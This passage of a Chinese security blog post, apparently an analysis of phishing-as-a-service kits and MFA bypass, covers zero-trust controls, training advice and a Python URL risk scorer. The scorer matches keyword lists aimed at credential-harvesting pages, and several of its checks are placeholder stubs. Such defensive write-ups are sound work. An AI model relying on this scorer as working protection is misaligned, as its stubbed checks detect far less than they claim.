\u96f6\u4fe1\u4efb\u8bbf\u95ee\u63a7\u5236\u67b6\u6784<\/p>\n<p>\u4ece\u67b6\u6784\u5c42\u9762\u964d\u4f4e\u51ed\u636e\u6cc4\u9732\u7684\u5f71\u54cd&#xff1a;<\/p>\n<p>\u6700\u5c0f\u6743\u9650\u539f\u5219&#xff1a;\u7528\u6237\u4ec5\u83b7\u5f97\u5b8c\u6210\u5de5\u4f5c\u6240\u9700\u7684\u6700\u5c0f\u6743\u9650&#xff0c;\u5373\u4f7f\u51ed\u636e\u88ab\u76d7&#xff0c;\u653b\u51fb\u8005\u4e5f\u65e0\u6cd5\u8bbf\u95ee\u654f\u611f\u8d44\u6e90\u3002<\/p>\n<p>\u5fae\u5206\u6bb5\u7f51\u7edc&#xff1a;\u5c06\u7f51\u7edc\u5212\u5206\u4e3a\u591a\u4e2a\u5b89\u5168\u57df&#xff0c;\u9650\u5236\u6a2a\u5411\u79fb\u52a8\u80fd\u529b\u3002\u653b\u51fb\u8005\u5373\u4f7f\u83b7\u53d6\u521d\u59cb\u8bbf\u95ee\u6743\u9650&#xff0c;\u4e5f\u96be\u4ee5\u6269\u6563\u81f3\u6838\u5fc3\u7cfb\u7edf\u3002<\/p>\n<p>\u6301\u7eed\u9a8c\u8bc1&#xff1a;\u4e0d\u4fe1\u4efb\u4efb\u4f55\u5355\u6b21\u8ba4\u8bc1\u7ed3\u679c&#xff0c;\u5728\u5173\u952e\u64cd\u4f5c\u524d\u8981\u6c42\u91cd\u65b0\u9a8c\u8bc1\u8eab\u4efd\u3002<\/p>\n<p>5.4 \u5b89\u5168\u610f\u8bc6\u57f9\u8bad\u7684\u9488\u5bf9\u6027\u4f18\u5316<\/p>\n<p>\u4f20\u7edf\u5b89\u5168\u610f\u8bc6\u57f9\u8bad\u5f80\u5f80\u6d41\u4e8e\u5f62\u5f0f&#xff0c;\u9700\u9488\u5bf9PhaaS\u653b\u51fb\u7279\u70b9\u8fdb\u884c\u4f18\u5316&#xff1a;<\/p>\n<p>CAPTCHA\u540e\u4ecd\u9700\u9a8c\u8bc1&#xff1a;\u6559\u80b2\u7528\u6237\u5373\u4f7f\u9875\u9762\u663e\u793aCAPTCHA&#xff0c;\u4e5f\u4e0d\u4ee3\u8868\u7f51\u7ad9\u53ef\u4fe1\u3002\u5e94\u901a\u8fc7\u72ec\u7acb\u6e20\u9053\u9a8c\u8bc1URL\u771f\u5b9e\u6027\u3002<\/p>\n<p>\u4e8c\u7ef4\u7801\u6838\u9a8c&#xff1a;\u57f9\u8bad\u7528\u6237\u626b\u63cf\u4e8c\u7ef4\u7801\u524d\u786e\u8ba4\u6765\u6e90\u53ef\u4fe1&#xff0c;\u4e0d\u626b\u63cf\u672a\u77e5\u6216\u53ef\u7591\u7684\u4e8c\u7ef4\u7801\u3002<\/p>\n<p>MFA\u75b2\u52b3\u653b\u51fb\u9632\u8303&#xff1a;\u544a\u77e5\u7528\u6237\u8b66\u60d5\u9891\u7e41\u7684MFA\u8bf7\u6c42&#xff0c;\u5982\u9047\u5f02\u5e38\u5e94\u7acb\u5373\u62a5\u544a\u5b89\u5168\u56e2\u961f\u3002<\/p>\n<p>\u52a9\u8bb0\u8bcd\u4e0e\u79c1\u94a5\u4fdd\u62a4&#xff1a;\u660e\u786e\u544a\u77e5\u4efb\u4f55\u5b98\u65b9\u673a\u6784\u4e0d\u4f1a\u901a\u8fc7\u90ae\u4ef6\u3001\u7535\u8bdd\u7d22\u53d6\u52a9\u8bb0\u8bcd\u3001\u79c1\u94a5\u6216\u5b8c\u6574\u5bc6\u7801\u3002<\/p>\n<p>5.5 \u6280\u672f\u9632\u5fa1\u4ee3\u7801\u793a\u4f8b<\/p>\n<p>\u4ee5\u4e0b\u4ee3\u7801\u793a\u4f8b\u5c55\u793a\u4e86\u5982\u4f55\u5728\u4f01\u4e1a\u7f51\u5173\u5c42\u9762\u5b9e\u73b0URL\u5b9e\u65f6\u98ce\u9669\u8bc4\u4f30&#xff1a;<\/p>\n<p># URL\u98ce\u9669\u8bc4\u4f30\u5f15\u64ce<\/p>\n<p>import requests<\/p>\n<p>from urllib.parse import urlparse<\/p>\n<p>import hashlib<\/p>\n<p>import time<\/p>\n<p>class URLRiskEngine:<\/p>\n<p>def __init__(self):<\/p>\n<p>self.domain_reputation_db &#061; {}<\/p>\n<p>self.phishing_signature_db &#061; self.load_phishing_signatures()<\/p>\n<p>def load_phishing_signatures(self):<\/p>\n<p>&#034;&#034;&#034;\u52a0\u8f7d\u9493\u9c7c\u9875\u9762\u7279\u5f81\u7b7e\u540d\u5e93&#034;&#034;&#034;<\/p>\n<p>return {<\/p>\n<p>&#039;credential_form&#039;: [&#039;password&#039;, &#039;passwd&#039;, &#039;credential&#039;, &#039;mfa_code&#039;],<\/p>\n<p>&#039;brand_impersonation&#039;: [&#039;microsoft&#039;, &#039;google&#039;, &#039;apple&#039;, &#039;ledger&#039;, &#039;trezor&#039;],<\/p>\n<p>&#039;urgency_keywords&#039;: [&#039;urgent&#039;, &#039;verify&#039;, &#039;suspend&#039;, &#039;expire&#039;, &#039;immediate&#039;]<\/p>\n<p>}<\/p>\n<p>def analyze_url(self, url, user_context&#061;None):<\/p>\n<p>&#034;&#034;&#034;\u6267\u884cURL\u98ce\u9669\u5206\u6790&#034;&#034;&#034;<\/p>\n<p>risk_score &#061; 0<\/p>\n<p>risk_factors &#061; []<\/p>\n<p>parsed &#061; urlparse(url)<\/p>\n<p># 1. \u57df\u540d\u58f0\u8a89\u68c0\u67e5<\/p>\n<p>domain_risk &#061; self.check_domain_reputation(parsed.netloc)<\/p>\n<p>risk_score &#043;&#061; domain_risk[&#039;score&#039;]<\/p>\n<p>risk_factors.extend(domain_risk[&#039;factors&#039;])<\/p>\n<p># 2. \u8df3\u8f6c\u94fe\u5206\u6790<\/p>\n<p>redirect_chain &#061; self.analyze_redirect_chain(url)<\/p>\n<p>if len(redirect_chain) &gt; 3:<\/p>\n<p>risk_score &#043;&#061; 30<\/p>\n<p>risk_factors.append(&#039;Excessive redirect chain detected&#039;)<\/p>\n<p># 3. \u9875\u9762\u5185\u5bb9\u5206\u6790<\/p>\n<p>content_risk &#061; self.analyze_page_content(url)<\/p>\n<p>risk_score &#043;&#061; content_risk[&#039;score&#039;]<\/p>\n<p>risk_factors.extend(content_risk[&#039;factors&#039;])<\/p>\n<p># 4. SSL\u8bc1\u4e66\u68c0\u67e5<\/p>\n<p>ssl_risk &#061; self.check_ssl_certificate(parsed.netloc)<\/p>\n<p>risk_score &#043;&#061; ssl_risk[&#039;score&#039;]<\/p>\n<p>risk_factors.extend(ssl_risk[&#039;factors&#039;])<\/p>\n<p># 5. \u7528\u6237\u4e0a\u4e0b\u6587\u8bc4\u4f30<\/p>\n<p>if user_context:<\/p>\n<p>context_risk &#061; self.evaluate_user_context(user_context)<\/p>\n<p>risk_score &#043;&#061; context_risk[&#039;score&#039;]<\/p>\n<p>risk_factors.extend(context_risk[&#039;factors&#039;])<\/p>\n<p>return {<\/p>\n<p>&#039;risk_score&#039;: min(100, risk_score),<\/p>\n<p>&#039;risk_level&#039;: self.get_risk_level(risk_score),<\/p>\n<p>&#039;risk_factors&#039;: risk_factors,<\/p>\n<p>&#039;recommendation&#039;: self.get_recommendation(risk_score)<\/p>\n<p>}<\/p>\n<p>def check_domain_reputation(self, domain):<\/p>\n<p>&#034;&#034;&#034;\u68c0\u67e5\u57df\u540d\u58f0\u8a89&#034;&#034;&#034;<\/p>\n<p>score &#061; 0<\/p>\n<p>factors &#061; []<\/p>\n<p># \u68c0\u67e5\u57df\u540d\u5e74\u9f84<\/p>\n<p>domain_age &#061; self.get_domain_age(domain)<\/p>\n<p>if domain_age and domain_age &lt; 30:<\/p>\n<p>score &#043;&#061; 20<\/p>\n<p>factors.append(&#039;Domain registered within last 30 days&#039;)<\/p>\n<p># \u68c0\u67e5\u57df\u540d\u76f8\u4f3c\u5ea6&#xff08;\u4e0e\u77e5\u540d\u54c1\u724c&#xff09;<\/p>\n<p>brand_domains &#061; [&#039;microsoft.com&#039;, &#039;google.com&#039;, &#039;office365.com&#039;]<\/p>\n<p>for brand in brand_domains:<\/p>\n<p>similarity &#061; self.calculate_similarity(domain, brand)<\/p>\n<p>if similarity &gt; 0.8:<\/p>\n<p>score &#043;&#061; 25<\/p>\n<p>factors.append(f&#039;High similarity to {brand}&#039;)<\/p>\n<p>return {&#039;score&#039;: score, &#039;factors&#039;: factors}<\/p>\n<p>def analyze_redirect_chain(self, url):<\/p>\n<p>&#034;&#034;&#034;\u5206\u6790URL\u8df3\u8f6c\u94fe&#034;&#034;&#034;<\/p>\n<p>chain &#061; []<\/p>\n<p>current_url &#061; url<\/p>\n<p>visited &#061; set()<\/p>\n<p>for _ in range(10):<\/p>\n<p>if current_url in visited:<\/p>\n<p>break<\/p>\n<p>visited.add(current_url)<\/p>\n<p>chain.append(current_url)<\/p>\n<p>try:<\/p>\n<p>resp &#061; requests.get(current_url, allow_redirects&#061;False, timeout&#061;5)<\/p>\n<p>if resp.status_code in [301, 302, 303, 307, 308]:<\/p>\n<p>current_url &#061; resp.headers.get(&#039;Location&#039;, &#039;&#039;)<\/p>\n<p>else:<\/p>\n<p>break<\/p>\n<p>except Exception:<\/p>\n<p>break<\/p>\n<p>return chain<\/p>\n<p>def analyze_page_content(self, url):<\/p>\n<p>&#034;&#034;&#034;\u5206\u6790\u9875\u9762\u5185\u5bb9\u98ce\u9669&#034;&#034;&#034;<\/p>\n<p>score &#061; 0<\/p>\n<p>factors &#061; []<\/p>\n<p>try:<\/p>\n<p>resp &#061; requests.get(url, timeout&#061;10, headers&#061;{&#039;User-Agent&#039;: &#039;Mozilla\/5.0&#039;})<\/p>\n<p>content &#061; resp.text.lower()<\/p>\n<p># \u68c0\u67e5\u51ed\u8bc1\u6536\u96c6\u8868\u5355<\/p>\n<p>for keyword in self.phishing_signature_db[&#039;credential_form&#039;]:<\/p>\n<p>if keyword in content:<\/p>\n<p>score &#043;&#061; 15<\/p>\n<p>factors.append(f&#039;Credential form keyword detected: {keyword}&#039;)<\/p>\n<p>break<\/p>\n<p># \u68c0\u67e5\u54c1\u724c\u5192\u5145<\/p>\n<p>for brand in self.phishing_signature_db[&#039;brand_impersonation&#039;]:<\/p>\n<p>if brand in content:<\/p>\n<p>score &#043;&#061; 10<\/p>\n<p>factors.append(f&#039;Brand impersonation keyword: {brand}&#039;)<\/p>\n<p># \u68c0\u67e5\u7d27\u6025\u6027\u5173\u952e\u8bcd<\/p>\n<p>urgency_count &#061; sum(1 for k in self.phishing_signature_db[&#039;urgency_keywords&#039;] if k in content)<\/p>\n<p>if urgency_count &gt;&#061; 2:<\/p>\n<p>score &#043;&#061; 20<\/p>\n<p>factors.append(&#039;Multiple urgency keywords detected&#039;)<\/p>\n<p># \u68c0\u67e5CAPTCHA\u5b58\u5728&#xff08;\u53ef\u80fd\u7528\u4e8e\u89c4\u907f\u68c0\u6d4b&#xff09;<\/p>\n<p>if &#039;captcha&#039; in content or &#039;recaptcha&#039; in content:<\/p>\n<p>score &#043;&#061; 10<\/p>\n<p>factors.append(&#039;CAPTCHA detected (possible anti-automation)&#039;)<\/p>\n<p>except Exception as e:<\/p>\n<p>factors.append(f&#039;Content analysis failed: {str(e)}&#039;)<\/p>\n<p>return {&#039;score&#039;: score, &#039;factors&#039;: factors}<\/p>\n<p>def check_ssl_certificate(self, domain):<\/p>\n<p>&#034;&#034;&#034;\u68c0\u67e5SSL\u8bc1\u4e66&#034;&#034;&#034;<\/p>\n<p>score &#061; 0<\/p>\n<p>factors &#061; []<\/p>\n<p># \u7b80\u5316\u5b9e\u73b0&#xff0c;\u5b9e\u9645\u5e94\u4f7f\u7528ssl\u5e93\u83b7\u53d6\u8bc1\u4e66\u8be6\u60c5<\/p>\n<p>if not domain.startswith(&#039;www.&#039;):<\/p>\n<p>score &#043;&#061; 5<\/p>\n<p>factors.append(&#039;Non-standard domain format&#039;)<\/p>\n<p>return {&#039;score&#039;: score, &#039;factors&#039;: factors}<\/p>\n<p>def get_risk_level(self, score):<\/p>\n<p>if score &gt;&#061; 70:<\/p>\n<p>return &#039;CRITICAL&#039;<\/p>\n<p>elif score &gt;&#061; 50:<\/p>\n<p>return &#039;HIGH&#039;<\/p>\n<p>elif score &gt;&#061; 30:<\/p>\n<p>return &#039;MEDIUM&#039;<\/p>\n<p>else:<\/p>\n<p>return &#039;LOW&#039;<\/p>\n<p>def get_recommendation(self, score):<\/p>\n<p>if score &gt;&#061; 70:<\/p>\n<p>return &#039;Block access immediately&#039;<\/p>\n<p>elif score &gt;&#061; 50:<\/p>\n<p>return &#039;Warn user and require confirmation&#039;<\/p>\n<p>elif score &gt;&#061; 30:<\/p>\n<p>return &#039;Monitor and log access&#039;<\/p>\n<p>else:<\/p>\n<p>return &#039;Allow with standard logging&#039;<\/p>\n<p>def get_domain_age(self, domain):<\/p>\n<p># \u7b80\u5316\u5b9e\u73b0&#xff0c;\u5b9e\u9645\u5e94\u8c03\u7528WHOIS API<\/p>\n<p>return None<\/p>\n<p>def calculate_similarity(self, domain1, domain2):<\/p>\n<p># \u7b80\u5316\u5b9e\u73b0&#xff0c;\u5b9e\u9645\u5e94\u4f7f\u7528\u7f16\u8f91\u8ddd\u79bb\u7b97\u6cd5<\/p>\n<p>return 0.0<\/p>\n<p>def evaluate_user_context(self, context):<\/p>\n<p># \u8bc4\u4f30\u7528\u6237\u4e0a\u4e0b\u6587\u98ce\u9669<\/p>\n<p>return {&#039;score&#039;: 0, &#039;factors&#039;: []}<\/p>\n<p># \u4f7f\u7528\u793a\u4f8b<\/p>\n<p>engine &#061; URLRiskEngine()<\/p>\n<p>result &#061; engine.analyze_url(&#039;https:\/\/suspicious-phishing-site.com\/login&#039;)<\/p>\n<p>print(f&#034;Risk Score: {result[&#039;risk_score&#039;]}&#034;)<\/p>\n<p>print(f&#034;Risk Level: {result[&#039;risk_level&#039;]}&#034;)<\/p>\n<p>print(f&#034;Factors: {result[&#039;risk_factors&#039;]}&#034;)<\/p>\n<p>print(f&#034;Recommendation: {result[&#039;recommendation&#039;]}&#034;)<\/p>\n<p>\u4e0a\u8ff0\u4ee3\u7801\u5c55\u793a\u4e86\u4f01\u4e1a\u7f51\u5173\u5c42\u9762\u5b9e\u73b0URL\u5b9e\u65f6\u98ce\u9669\u8bc4\u4f30\u7684\u57fa\u672c\u6846\u67b6\u3002\u901a\u8fc7\u591a\u7ef4\u5ea6\u5206\u6790&#xff08;\u57df\u540d\u58f0\u8a89\u3001\u8df3\u8f6c\u94fe\u3001\u9875\u9762\u5185\u5bb9\u3001SSL\u8bc1\u4e66\u3001\u7528\u6237\u4e0a\u4e0b\u6587&#xff09;&#xff0c;\u7cfb\u7edf\u53ef\u5bf9\u6bcf\u4e2a\u8bbf\u95ee\u8bf7\u6c42\u8fdb\u884c\u52a8\u6001\u98ce\u9669\u8bc4\u5206&#xff0c;\u5e76\u636e\u6b64\u91c7\u53d6\u76f8\u5e94\u7684\u963b\u65ad\u6216\u544a\u8b66\u63aa\u65bd\u3002<\/p>\n<p>6 \u7ed3\u8bed<\/p>\n<p>PhaaS\u5de5\u5177\u5305\u7684\u5feb\u901f\u6f14\u8fdb\u6807\u5fd7\u7740\u7f51\u7edc\u9493\u9c7c\u653b\u51fb\u5df2\u8fdb\u5165\u9ad8\u5ea6\u4e13\u4e1a\u5316\u3001\u670d\u52a1\u5316\u7684\u65b0\u9636\u6bb5\u30022025\u5e74Barracuda\u5a01\u80c1\u60c5\u62a5\u62a5\u544a\u62ab\u9732\u7684\u6570\u636e\u8868\u660e&#xff0c;\u653b\u51fb\u8005\u6b63\u901a\u8fc7\u6280\u672f\u5de5\u7a0b\u5316\u624b\u6bb5\u6301\u7eed\u964d\u4f4e\u653b\u51fb\u95e8\u69db&#xff0c;\u540c\u65f6\u63d0\u5347\u7ed5\u8fc7\u68c0\u6d4b\u7684\u80fd\u529b\u3002MFA\u7ed5\u8fc7\u3001URL\u6df7\u6dc6\u3001CAPTCHA\u53cd\u68c0\u6d4b\u7b49\u6280\u672f\u7684\u666e\u53ca&#xff0c;\u4f7f\u5f97\u4f20\u7edf\u57fa\u4e8e\u9759\u6001\u89c4\u5219\u548c\u57df\u540d\u58f0\u8a89\u7684\u9632\u62a4\u4f53\u7cfb\u9762\u4e34\u4e25\u5cfb\u6311\u6218\u3002<\/p>\n<p>\u4ece\u6280\u672f\u5c42\u9762\u770b&#xff0c;PhaaS\u5de5\u5177\u7684\u6838\u5fc3\u4f18\u52bf\u5728\u4e8e\u5176\u6a21\u5757\u5316\u67b6\u6784\u548c\u6301\u7eed\u8fed\u4ee3\u80fd\u529b\u3002\u653b\u51fb\u8005\u65e0\u9700\u5177\u5907\u6df1\u539a\u7684\u6280\u672f\u80cc\u666f&#xff0c;\u5373\u53ef\u901a\u8fc7\u8ba2\u9605\u670d\u52a1\u83b7\u5f97\u5b8c\u6574\u7684\u653b\u51fb\u57fa\u7840\u8bbe\u65bd\u3002\u4e2d\u95f4\u4eba\u4ee3\u7406\u6280\u672f\u4f7f\u5f97MFA\u9632\u62a4\u6548\u679c\u88ab\u5927\u5e45\u524a\u5f31&#xff0c;URL\u6df7\u6dc6\u6280\u672f\u4f7f\u5f97\u68c0\u6d4b\u7cfb\u7edf\u96be\u4ee5\u8bc6\u522b\u6700\u7ec8\u76ee\u6807&#xff0c;CAPTCHA\u673a\u5236\u963b\u788d\u4e86\u81ea\u52a8\u5316\u5206\u6790\u7cfb\u7edf\u7684\u6b63\u5e38\u5de5\u4f5c\u3002\u8fd9\u4e9b\u6280\u672f\u7684\u7ec4\u5408\u4f7f\u7528&#xff0c;\u5f62\u6210\u4e86\u5b8c\u6574\u7684\u653b\u51fb\u95ed\u73af\u3002<\/p>\n<p>\u4ece\u9632\u5fa1\u5c42\u9762\u770b&#xff0c;\u5355\u4e00\u6280\u672f\u6216\u4ea7\u54c1\u5df2\u65e0\u6cd5\u6709\u6548\u5e94\u5bf9PhaaS\u5a01\u80c1\u3002\u5fc5\u987b\u6784\u5efa\u6db5\u76d6URL\u5b9e\u65f6\u5206\u6790\u3001\u4f1a\u8bdd\u884c\u4e3a\u76d1\u63a7\u3001\u96f6\u4fe1\u4efb\u8bbf\u95ee\u63a7\u5236\u7684\u591a\u5c42\u9632\u5fa1\u4f53\u7cfb\u3002\u540c\u65f6&#xff0c;\u5b89\u5168\u610f\u8bc6\u57f9\u8bad\u9700\u9488\u5bf9\u65b0\u578b\u653b\u51fb\u624b\u6cd5\u8fdb\u884c\u4f18\u5316&#xff0c;\u6559\u80b2\u7528\u6237\u8bc6\u522bCAPTCHA\u540e\u7684\u98ce\u9669\u3001\u6838\u9a8c\u4e8c\u7ef4\u7801\u6765\u6e90\u3001\u8b66\u60d5MFA\u75b2\u52b3\u653b\u51fb\u7b49\u573a\u666f\u3002<\/p>\n<p>\u672c\u7814\u7a76\u57fa\u4e8eBarracuda\u516c\u5f00\u62a5\u544a\u8fdb\u884c\u6280\u672f\u5206\u6790&#xff0c;\u5b58\u5728\u4e00\u5b9a\u5c40\u9650\u6027\u3002\u5b9e\u9645\u653b\u51fb\u573a\u666f\u53ef\u80fd\u66f4\u52a0\u590d\u6742&#xff0c;PhaaS\u5de5\u5177\u7684\u5177\u4f53\u5b9e\u73b0\u7ec6\u8282\u4e5f\u53ef\u80fd\u56e0\u5e73\u53f0\u800c\u5f02\u3002\u672a\u6765\u7814\u7a76\u53ef\u8fdb\u4e00\u6b65\u6df1\u5165\u5206\u6790\u5177\u4f53PhaaS\u5e73\u53f0\u7684\u6e90\u4ee3\u7801&#xff0c;\u8bc4\u4f30\u4e0d\u540c\u9632\u5fa1\u7b56\u7565\u7684\u5b9e\u9645\u6548\u679c&#xff0c;\u5e76\u63a2\u7d22\u57fa\u4e8e\u673a\u5668\u5b66\u4e60\u7684\u81ea\u52a8\u5316\u68c0\u6d4b\u65b9\u6848\u3002<\/p>\n<p>\u7f51\u7edc\u5b89\u5168\u662f\u6301\u7eed\u7684\u5bf9\u6297\u8fc7\u7a0b&#xff0c;\u653b\u51fb\u6280\u672f\u4e0e\u9632\u5fa1\u80fd\u529b\u7684\u535a\u5f08\u5c06\u957f\u671f\u5b58\u5728\u3002\u4f01\u4e1a\u5b89\u5168\u56e2\u961f\u9700\u4fdd\u6301\u5bf9\u5a01\u80c1\u60c5\u62a5\u7684\u6301\u7eed\u5173\u6ce8&#xff0c;\u53ca\u65f6\u66f4\u65b0\u9632\u5fa1\u7b56\u7565&#xff0c;\u5728\u6280\u672f\u3001\u7ba1\u7406\u3001\u4eba\u5458\u4e09\u4e2a\u7ef4\u5ea6\u5efa\u7acb\u534f\u540c\u8054\u52a8\u7684\u5b89\u5168\u4f53\u7cfb&#xff0c;\u65b9\u80fd\u5728\u65e5\u76ca\u590d\u6742\u7684\u5a01\u80c1\u73af\u5883\u4e2d\u6709\u6548\u4fdd\u62a4\u7ec4\u7ec7\u8d44\u4ea7\u4e0e\u7528\u6237\u5b89\u5168\u3002<\/p>\n<p>\u7f16\u8f91&#xff1a;\u82a6\u7b1b&#xff08;\u516c\u5171\u4e92\u8054\u7f51\u53cd\u7f51\u7edc\u9493\u9c7c\u5de5\u4f5c\u7ec4&#xff09;\u00a0<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u6458\u8981\u9493\u9c7c\u5373\u670d\u52a1&#xff08;Phishing-as-a-Service&#xff0c;PhaaS&#xff09;\u6a21\u5f0f\u7684\u5546\u4e1a\u5316\u53d1\u5c55\u663e\u8457\u964d\u4f4e\u4e86\u7f51\u7edc\u72af\u7f6a\u7684\u6280\u672f\u95e8\u69db&#xff0c;\u4f7f\u5f97\u4e0d\u5177\u5907\u6df1\u5ea6\u6280\u672f\u80fd\u529b\u7684\u653b\u51fb\u8005\u4e5f\u80fd\u53d1\u8d77\u590d\u6742\u7684\u51ed\u8bc1\u7a83\u53d6\u653b\u51fb\u3002\u672c\u6587\u57fa\u4e8eBarracuda Networks 2025\u5e74\u5ea6\u5a01\u80c1\u60c5\u62a5\u62a5\u544a&#xff0c;\u5bf9PhaaS\u5de5\u5177\u5305\u7684\u6280\u672f\u6f14\u8fdb\u8def\u5f84\u8fdb\u884c\u7cfb\u7edf\u6027\u5206\u6790\u3002\u7814\u7a76\u53d1\u73b0&#xff0c;2025\u5e74\u5df2\u77e5PhaaS\u5de5\u5177\u5305\u6570\u91cf\u540c\u6bd4\u589e\u957f100%&#xff0c;\u5176\u4e2d\u8fd1\u534a\u6570\u96c6\u6210\u591a\u56e0\u7d20\u8ba4\u8bc1<\/p>\n","protected":false},"author":2,"featured_media":77260,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[666,230,50,292,43,78,44],"topic":[],"class_list":["post-77263","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-server","tag-microsoft","tag-php","tag-50","tag-292","tag-43","tag-78","tag-44"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.3 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>\u9493\u9c7c\u5373\u670d\u52a1\u5de5\u5177\u5305\u6f14\u8fdb\u4e0e\u591a\u56e0\u7d20\u8ba4\u8bc1\u7ed5\u8fc7\u673a\u5236\u7814\u7a76\u2014\u2014\u57fa\u4e8e2025\u5e74Barracuda\u5a01\u80c1\u60c5\u62a5\u7684\u5b9e\u8bc1\u5206\u6790 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.wsisp.com\/helps\/77263.html\" \/>\n<meta property=\"og:locale\" content=\"zh_CN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u9493\u9c7c\u5373\u670d\u52a1\u5de5\u5177\u5305\u6f14\u8fdb\u4e0e\u591a\u56e0\u7d20\u8ba4\u8bc1\u7ed5\u8fc7\u673a\u5236\u7814\u7a76\u2014\u2014\u57fa\u4e8e2025\u5e74Barracuda\u5a01\u80c1\u60c5\u62a5\u7684\u5b9e\u8bc1\u5206\u6790 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\" \/>\n<meta property=\"og:description\" content=\"\u6458\u8981\u9493\u9c7c\u5373\u670d\u52a1&#xff08;Phishing-as-a-Service&#xff0c;PhaaS&#xff09;\u6a21\u5f0f\u7684\u5546\u4e1a\u5316\u53d1\u5c55\u663e\u8457\u964d\u4f4e\u4e86\u7f51\u7edc\u72af\u7f6a\u7684\u6280\u672f\u95e8\u69db&#xff0c;\u4f7f\u5f97\u4e0d\u5177\u5907\u6df1\u5ea6\u6280\u672f\u80fd\u529b\u7684\u653b\u51fb\u8005\u4e5f\u80fd\u53d1\u8d77\u590d\u6742\u7684\u51ed\u8bc1\u7a83\u53d6\u653b\u51fb\u3002\u672c\u6587\u57fa\u4e8eBarracuda Networks 2025\u5e74\u5ea6\u5a01\u80c1\u60c5\u62a5\u62a5\u544a&#xff0c;\u5bf9PhaaS\u5de5\u5177\u5305\u7684\u6280\u672f\u6f14\u8fdb\u8def\u5f84\u8fdb\u884c\u7cfb\u7edf\u6027\u5206\u6790\u3002\u7814\u7a76\u53d1\u73b0&#xff0c;2025\u5e74\u5df2\u77e5PhaaS\u5de5\u5177\u5305\u6570\u91cf\u540c\u6bd4\u589e\u957f100%&#xff0c;\u5176\u4e2d\u8fd1\u534a\u6570\u96c6\u6210\u591a\u56e0\u7d20\u8ba4\u8bc1\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.wsisp.com\/helps\/77263.html\" \/>\n<meta property=\"og:site_name\" content=\"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-24T01:41:16+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/02\/20260224014114-699d01ba9c30c.jpg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4\" \/>\n\t<meta name=\"twitter:data2\" content=\"10 \u5206\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/77263.html\",\"url\":\"https:\/\/www.wsisp.com\/helps\/77263.html\",\"name\":\"\u9493\u9c7c\u5373\u670d\u52a1\u5de5\u5177\u5305\u6f14\u8fdb\u4e0e\u591a\u56e0\u7d20\u8ba4\u8bc1\u7ed5\u8fc7\u673a\u5236\u7814\u7a76\u2014\u2014\u57fa\u4e8e2025\u5e74Barracuda\u5a01\u80c1\u60c5\u62a5\u7684\u5b9e\u8bc1\u5206\u6790 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\",\"isPartOf\":{\"@id\":\"https:\/\/www.wsisp.com\/helps\/#website\"},\"datePublished\":\"2026-02-24T01:41:16+00:00\",\"dateModified\":\"2026-02-24T01:41:16+00:00\",\"author\":{\"@id\":\"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.wsisp.com\/helps\/77263.html#breadcrumb\"},\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.wsisp.com\/helps\/77263.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/77263.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u9996\u9875\",\"item\":\"https:\/\/www.wsisp.com\/helps\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\u9493\u9c7c\u5373\u670d\u52a1\u5de5\u5177\u5305\u6f14\u8fdb\u4e0e\u591a\u56e0\u7d20\u8ba4\u8bc1\u7ed5\u8fc7\u673a\u5236\u7814\u7a76\u2014\u2014\u57fa\u4e8e2025\u5e74Barracuda\u5a01\u80c1\u60c5\u62a5\u7684\u5b9e\u8bc1\u5206\u6790\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/#website\",\"url\":\"https:\/\/www.wsisp.com\/helps\/\",\"name\":\"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\",\"description\":\"\u9999\u6e2f\u670d\u52a1\u5668_\u9999\u6e2f\u4e91\u670d\u52a1\u5668\u8d44\u8baf_\u670d\u52a1\u5668\u5e2e\u52a9\u6587\u6863_\u670d\u52a1\u5668\u6559\u7a0b\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.wsisp.com\/helps\/?s={search_term_string}\"},\"query-input\":\"required 